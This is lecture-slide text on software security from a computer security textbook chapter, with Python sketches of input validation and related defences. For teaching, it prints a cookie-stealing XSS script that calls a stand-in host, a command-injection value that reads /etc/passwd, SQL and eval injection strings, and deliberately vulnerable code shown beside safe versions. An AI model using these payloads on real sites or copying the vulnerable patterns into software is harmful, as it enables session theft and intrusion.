
Computer Security: Principles
and Practice
Chapter 11 –Software Security
by William Stallings and Lawrie Brown
Lecture slides by Lawrie Brown
1
Software Security
• many vulnerabilities result from poor programming
practices
– e.g., the OWASP Top Ten list includes five related to insecure
software code: unvalidated input, cross-site scripting,
buffer overflow, injection flaws, improper error handling
• often from insufficient checking / validation of
program input
• awareness of issues is critical
2
Software Quality vs Security
• software quality and reliability
– accidental failure of program
– from theoretically random unanticipated input
– improve using structured design and testing
– not how many bugs, but how often triggered in
general use
• software security is related
– but attacker chooses input distribution, specifically
targeting buggy code to exploit
– triggered by often very unlikely inputs
– which common tests don’t identify
3
Defensive Programming
• a form of defensive design to ensure continued
function of software despite unforeseen usage
• requires attention to all aspects of program
execution, environment, data processed
• also called secure programming
• assume nothing, check all potential errors
• rather than just focusing on solving the task
• must validate all assumptions
• a positive development
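As a hedged illustration of "assume nothing, check all potential errors", the short Python sketch below (the function name and file contents are hypothetical, not from the text) validates its argument, bounds how much it reads, and falls back to a default instead of assuming each operation succeeded.

# Defensive-programming sketch: validate every assumption explicitly.
def read_port_setting(path, default=8080):
    """Return a TCP port number read from a one-line config file."""
    if not isinstance(path, str) or not path:
        raise ValueError("path must be a non-empty string")
    try:
        with open(path, "rb") as f:
            text = f.read(16).strip()       # bound how much is read
    except OSError:
        return default                      # missing/unreadable file: use default
    if not text.isdigit():                  # don't assume the file holds a number
        return default
    port = int(text)
    if not 1 <= port <= 65535:              # don't assume it is a valid port
        return default
    return port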
4
Abstract View of Program
5
Handling Program Input
• incorrect handling is a very common failing
• input is any source of data from outside
– data read from keyboard, file, network
– also execution environment, configuration data
• must identify all data sources
• and explicitly validate assumptions on size and
type of values before use
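A minimal Python sketch of the same point (the APP_LOG_DIR variable and default path are assumptions for illustration): the execution environment is an input source too, so its values are checked against explicit size and character assumptions before use.

# Sketch: environment data is program input, so validate it before use.
import os
import re

DEFAULT_LOG_DIR = "/var/log/myapp"

def get_log_dir():
    value = os.environ.get("APP_LOG_DIR", DEFAULT_LOG_DIR)
    # explicit assumptions: absolute path, bounded length, no '..',
    # and only a small set of allowed characters
    if (len(value) > 256 or not value.startswith("/")
            or ".." in value
            or not re.fullmatch(r"[/A-Za-z0-9._-]+", value)):
        return DEFAULT_LOG_DIR
    return value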
6
Input Size & Buffer Overflow
• often have assumptions about buffer size
– e.g. that user input is only a line of text
– size buffer accordingly but fail to verify size
– resulting in buffer overflow (see Ch 10)
• testing may not identify vulnerability
– since focus on “normal, expected” inputs
• safe coding treats all input as dangerous
– hence must process so as to protect program
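Python strings grow as needed, so a C-style overflow cannot occur in the sketch below, but it shows the corresponding safe-coding habit (the 256-byte limit is an assumed value): state the size assumption explicitly and verify it rather than trusting the sender.

# Sketch: check input length against the assumed maximum, don't trust it.
import sys

MAX_LINE = 256   # assumed upper bound on one line of user input

def read_line_checked():
    # read one byte beyond the limit so an over-long line is detectable
    data = sys.stdin.buffer.readline(MAX_LINE + 1)
    if len(data) > MAX_LINE:
        raise ValueError("input line longer than %d bytes" % MAX_LINE)
    return data.rstrip(b"\r\n")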
7
Interpretation of Input
• program input may be binary or text
– binary interpretation depends on encoding and is
usually application specific
– text encoded in a character set e.g. ASCII
– internationalization has increased variety
– also need to validate interpretation before use
• e.g. filename, URL, email address, identifier
• failure to validate may result in an exploitable
vulnerability
8
Injection Attacks
• flaws relating to invalid input handling which
then influences program execution
– often when passed as a parameter to a helper
program or other utility or subsystem
• most often occurs in scripting languages
– encourage reuse of other programs / modules
– often seen in web CGI scripts, PHP, etc.
• command injection, SQL injection, code injection
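The figure on the next slide shows the attack against a Perl finger CGI script; it is not reproduced here, but a hedged Python analogue of the same flaw is sketched below (the finger command and variable names are illustrative). A validated counterpart appears with the "safety extension" slide.

# Sketch: command injection - raw user input handed to a shell.
import subprocess

def finger_unsafe(user):
    # VULNERABLE: user = "lpb; cat /etc/passwd" runs a second command,
    # because the whole string is interpreted by the shell.
    return subprocess.run("finger " + user, shell=True,
                          capture_output=True, text=True).stdout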
9
A Perl CGI Command Injection Attack
10
Safety extension to Perl finger CGI script
• counter attack by validating input
– pattern matching to reject invalid input
– only allow alphanumeric characters in this example
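Continuing the hypothetical Python analogue from the injection slide, the defence mirrors the bullets above: reject anything that is not purely alphanumeric, and invoke the helper program with an argument list so no shell ever parses the input.

# Sketch: whitelist validation plus no shell = no command injection.
import re
import subprocess

def finger_safe(user):
    if not re.fullmatch(r"[A-Za-z0-9]+", user):   # only alphanumerics allowed
        raise ValueError("invalid user name")
    result = subprocess.run(["finger", user],     # argument list, no shell
                            capture_output=True, text=True)
    return result.stdout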
11
SQL Injection
• another widely exploited injection attack
• when input is used in an SQL query to a database
– SQL meta-characters are the concern
– must check and validate input for these
• e.g., PHP's mysql_real_escape_string() prepends backslashes to the
characters \x00, \n, \r, \, ', " and \x1a
• escaping alone is not enough: a value such as id=23 OR 1=1 contains
nothing to escape, so the input must still be validated
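A hedged sketch in Python with sqlite3 (table and column names are made up): since id=23 OR 1=1 has no quotes to escape, the value is validated as numeric and passed as a query parameter rather than spliced into the SQL text.

# Sketch: validate the value and use a parameterized query.
import sqlite3

def lookup_user(conn, user_id):
    # VULNERABLE alternative: "SELECT name FROM users WHERE id = " + user_id
    # with user_id = "23 OR 1=1" returns every row.
    if not user_id.isdigit():                     # must be a plain integer
        raise ValueError("id must be numeric")
    cur = conn.execute("SELECT name FROM users WHERE id = ?", (int(user_id),))
    return cur.fetchall()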
12
Code Injection
• a third common variant
• input includes code that is then executed
– e.g., PHP remote code injection vulnerability
• an unsanitized variable (e.g., populated from global form-field variables) used in a remote include() pulls in attacker-supplied PHP code
– e.g., JavaScript code injection
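The text's examples are PHP and JavaScript; as a hedged Python illustration of the same idea, the first function below treats input as code and hands execution to the attacker, while the second accepts only data literals.

# Sketch: input executed as code versus input parsed strictly as data.
import ast

def parse_value_unsafe(text):
    # VULNERABLE: text = "__import__('os').system('id')" executes a command
    return eval(text)

def parse_value_safe(text):
    # accepts only Python literals (numbers, strings, lists, dicts, ...)
    return ast.literal_eval(text)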
13
JavaScript Security Model in Browsers
• figure: the JavaScript code in http://www.domainA.com:8080/pageA.htm
and the JavaScript code in http://www.domainB.com/pageB.htm each run in
a sandbox inside the web browser, separated by the same-origin policy
• attacks often breach these two restrictions (sandbox and same-origin)
14
Insecure JavaScript Inclusion

• the top-level document is the one loaded from the URL in the address
bar, e.g. http://www.domainA.com/pageA.htm
• direct inclusion: pageA itself contains
<script type="text/javascript" src="http://www.domainB.com/foo.js"></script>
• indirect inclusion: pageA loads http://www.domainA.com/frame.htm,
which contains
<script type="text/javascript" src="http://www.domainB.com/foo.js"></script>
• scripts in foo.js inherit the origin of pageA and obtain maximum
permissions
– they may be malicious or compromised!
prevalent: 4,517 homepages (out of 6,805) include JavaScript files
from 1,985 external domains into their top-level documents
15
Insecure JavaScript Dynamic Generation
– techniques to dynamically generate JavaScript
• the eval() function
• the document.write() method
• the innerHTML property
• DOM methods such as document.createElement()
– the first three techniques are more dangerous
• scripts could be immediately executed
• detecting malicious scripts is challenging
eval() function calls appeared on about 3,000 homepages (out of 6,805);
they were misused or abused in 70% of the sampled cases (of 700 pages).
16
Cross Site Scripting Attacks
• malicious scripts are injected into a trusted (vulnerable)
website, and later executed on the browser of a user
• caused by failed input/output validation; violates the same-origin policy
• non-persistent (or reflected) XSS
– the injected code is reflected off the web server to a user
– when a user clicks a malicious link or submits a malicious form
• persistent (or stored) XSS
– the injected code is permanently stored on the target server DB
• DOM-based XSS
– related to JavaScript dynamic generation
17
Persistent XSS Example
• e.g., guestbooks, wikis, blogs etc
• where user input includes script code
– e.g. to collect cookie details of viewing users
• need to validate data supplied
– including handling various possible encodings
• attacks both input and output handling
Thanks for this information, its great!
<script>document.location='http://hacker.web.site/cookie.cgi?'+
document.cookie</script>
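A hedged Python sketch of the output-handling half of the defence (the rendering helper is hypothetical): HTML-escaping the stored comment before it is sent to other users means the injected <script> element is displayed as text rather than executed.

# Sketch: escape untrusted stored content before writing it into a page.
import html

def render_guestbook_entry(comment):
    # '<', '>', '&' and quotes become entities, so the viewing user's
    # browser shows the script instead of running it
    return "<p>" + html.escape(comment, quote=True) + "</p>"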
18
Validating Input Syntax
• to ensure input data meets assumptions
– e.g. is printable, HTML, email, userid etc
• compare to what is known acceptable
• not to what is known to be dangerous
– as blacklists can miss new problems, bypass methods, multiple encodings
• commonly use regular expressions
– pattern of characters describe allowable input
– details vary between languages
• bad input either rejected or altered
• validating numeric input also needs a range check, not just a character check (see the sketch below)
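A small Python sketch of whitelist validation for numeric input (the pattern and range are assumptions, not taken from the text): the value must match a known-acceptable pattern and lie within a sensible range before it is used.

# Sketch: accept only what matches a known-good pattern and range.
import re

def parse_quantity(text):
    if not re.fullmatch(r"[0-9]{1,4}", text):   # digits only, bounded length
        raise ValueError("quantity must be 1-4 digits")
    value = int(text)
    if not 1 <= value <= 1000:                  # numeric range check
        raise ValueError("quantity out of range")
    return value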
19
Input Fuzzing
• powerful testing method using a large range
of randomly generated inputs
– to test whether program/function correctly
handles abnormal inputs
– simple, free of assumptions, cheap
– assists with reliability as well as security
• can also use templates to generate classes of
known problem inputs
• could miss bugs for very specific input values
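A minimal fuzzing harness sketched in Python (the parse argument stands for whatever routine is under test): many randomly generated inputs are fed in, expected rejections are ignored, and anything else is recorded as a potential bug.

# Sketch: drive a routine with random inputs and collect unexpected failures.
import os
import random

def fuzz(parse, runs=10000, max_len=512):
    failures = []
    for _ in range(runs):
        data = os.urandom(random.randint(0, max_len))   # random "abnormal" input
        try:
            parse(data)                                  # routine under test
        except ValueError:
            pass                                         # clean rejection is fine
        except Exception as exc:                         # anything else is a finding
            failures.append((data, exc))
    return failures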
20
XSS Related Research Examples (1)
• “Cross site scripting prevention with dynamic data tainting and
static analysis”, Philipp Vogt et al., NDSS 2007
– tracking the flow of sensitive information inside the web browser. If sensitive
information is about to be transferred to a third party, the user can decide if
this should be permitted or not.
• “Defeating Script Injection Attacks with Browser-Enforced
Embedded Policies”, Trevor Jim, Nikhil Swamy, Michael Hicks,
WWW 2007
– the browser is the ideal place to filter scripts; the web site should supply the
filtering policy to the browser. Whitelist policy and DOM sandbox policy
(noexecute for rich content).
• “Reining in the Web with Content Security Policy”, Sid Stamm,
Brandon Sterne, Gervase Markham, WWW 2010
21
XSS Related Research Examples (2)
• “BLUEPRINT: Robust Prevention of Cross-site Scripting Attacks for
Existing Browsers”, Mike Ter Louw, V.N. Venkatakrishnan, S&P 2009
– browsers cannot be entrusted to make script identification decisions in
untrusted HTML due to their unreliable parsing behavior. Enables a web
application to create the parse tree for untrusted content programmatically
using a small set of low-level Document Object Model (DOM) primitives.
• “Regular Expressions Considered Harmful in Client-Side XSS Filters”,
Daniel Bates, Adam Barth, and Collin Jackson, WWW’2010
– existing filters are unacceptably slow, easily circumvented, or could introduce
vulnerabilities. Instead of using regular expressions to simulate the HTML
parser, client-side XSS filters should integrate with the rendering pipeline and
examine the response after it has been parsed.
22
Writing Safe Program Code
• Correct algorithm implementation
– e.g., predictable random numbers used for TCP (SYN-ACK) initial sequence numbers, leftover debug code
• Ensuring machine language corresponds to algorithm
– usually must assume the compiler/interpreter is correct; only the highest Common Criteria assurance level (EAL 7) requires this correspondence to be verified
• Correct interpretation of data values
– strongly typed languages are safer
• Correct use of memory
– programmer may need to ensure correct
allocation/release
• Preventing race conditions with shared memory
– correctly use appropriate synchronization primitives
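A hedged Python sketch of the last point (the shared counter is illustrative): without the lock, two threads can interleave their read-modify-write on the shared value; with it, the update is serialized.

# Sketch: protect shared state with a synchronization primitive.
import threading

balance = 0
balance_lock = threading.Lock()

def deposit(amount):
    global balance
    with balance_lock:        # the read-modify-write cannot interleave
        balance += amount

threads = [threading.Thread(target=deposit, args=(1,)) for _ in range(100)]
for t in threads:
    t.start()
for t in threads:
    t.join()
assert balance == 100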
23
Interacting with O/S and other programs
• programs execute on systems under O/S
– mediates and shares access to resources
– constructs execution environment
• systems have multiple users
– with access permissions on resources / data
• programs may access shared resources
– race conditions, temporary files (see the sketch after this list)
• internal implementations of OS, hardware
– e.g., how to securely delete a file
• flow of information between programs
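As one concrete case from the list above, a hedged Python sketch of safe temporary-file handling: tempfile.mkstemp creates the file atomically with a random name and restrictive permissions, avoiding the predictable-name race in a shared directory.

# Sketch: create a temporary file safely instead of guessing a /tmp name.
import os
import tempfile

# risky pattern: open("/tmp/app.%d" % os.getpid(), "w") - the name is
# predictable and can be pre-created or symlinked by another user

fd, path = tempfile.mkstemp(prefix="app-")   # O_EXCL, mode 0600, random name
try:
    with os.fdopen(fd, "w") as f:
        f.write("intermediate results\n")
finally:
    os.unlink(path)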
24
Use of Least Privilege
• exploit of flaws may give attacker greater
privileges - privilege escalation
• hence run programs with least privilege
needed to complete their function
– determine suitable user and group to use
– whether to grant extra user or extra group privileges
• the latter is preferred and safer, but may not be sufficient
– ensure can only modify files/dirs needed
• otherwise compromise results in greater damage
• recheck these when moved or upgraded
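A hedged, POSIX-only Python sketch of running with least privilege (the appuser/appgroup names are assumptions): a program started as root performs its privileged setup, then permanently drops to an unprivileged user and group.

# Sketch (POSIX only): permanently drop root privileges after setup.
import grp
import os
import pwd

def drop_privileges(user="appuser", group="appgroup"):
    if os.getuid() != 0:
        return                          # not root, nothing to drop
    uid = pwd.getpwnam(user).pw_uid
    gid = grp.getgrnam(group).gr_gid
    os.setgroups([])                    # clear supplementary groups
    os.setgid(gid)                      # group first,
    os.setuid(uid)                      # then user, irreversibly
    os.umask(0o077)                     # restrictive default file permissions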
25
Root/Admin Programs
• programs with root / administrator privileges
a major target of attackers
– since provide highest levels of system access
– are needed to manage access to protected system
resources, e.g. network server ports
• often privilege only needed at start
– can then run as normal user
• good design partitions complex programs into
smaller modules, each with only the privileges it needs
26
Handling Program Output
• final concern is program output
– stored for future use, sent over net, displayed
– may be binary or text
• must ensure output conforms to the expected form,
interpretation and character set
– the receiver assumes the output has a common, trusted origin
– e.g. XSS, VT100 escape sequences, X terminal hijack
• the target is not the program itself but the device or
program displaying its output (see the sketch below)
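A hedged Python sketch of the terminal case (the escape-sequence pattern covers common CSI sequences only): untrusted text is stripped of escape sequences and other control characters before being written to the user's display.

# Sketch: sanitize untrusted text before sending it to a terminal.
import re

ANSI_CSI = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")   # ESC [ ... final byte

def safe_for_terminal(text):
    text = ANSI_CSI.sub("", text)
    # drop any remaining control characters except newline and tab
    return "".join(ch for ch in text
                   if ch in "\n\t" or (ord(ch) >= 0x20 and ord(ch) != 0x7f))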
27
Content-Sniffing XSS and CSRF Related Research
• “Secure Content Sniffing for Web Browsers, or How to Stop Papers
from Reviewing Themselves”, Adam Barth et al., S&P 2009
– For compatibility, every Web browser employs a content sniffing algorithm
that inspects the contents of HTTP responses and occasionally overrides the
MIME type provided by the server. They suggest two design principles for a
secure content-sniffing algorithm: avoid privilege escalation, which protects
sites that limit the MIME types they use when serving malicious content, and
use prefix-disjoint signatures, which protects sites that filter uploads.
• “Robust Defenses for Cross-Site Request Forgery”, Adam Barth,
Collin Jackson, and John C. Mitchell, CCS 2008
– presented login CSRF, analyzed limitations of existing approaches such as the
HTTP Referer header, and proposed that browsers implement the Origin header,
which provides the security benefits of the Referer header while responding
to privacy concerns.
28
Summary
• discussed software security issues
• handling program input safely
– size, interpretation, injection, XSS, fuzzing
• writing safe program code
– algorithm, machine language, data, memory
• interacting with O/S and other programs
– ENV, least privilege, syscalls / std libs, file lock,
temp files, other programs
• handling program output
29